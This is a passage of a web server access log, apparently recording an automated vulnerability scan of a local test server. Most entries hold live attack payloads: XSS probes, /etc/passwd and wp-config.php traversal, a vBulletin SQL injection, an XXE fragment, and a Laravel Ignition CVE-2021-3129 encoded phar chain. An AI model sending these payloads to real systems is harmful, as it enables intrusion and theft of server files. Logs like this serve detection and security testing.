(Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/arforms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/sendmail HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22supported_type\x22\x0D\x0A\x0D\x0Atxt%\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A5242880\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; 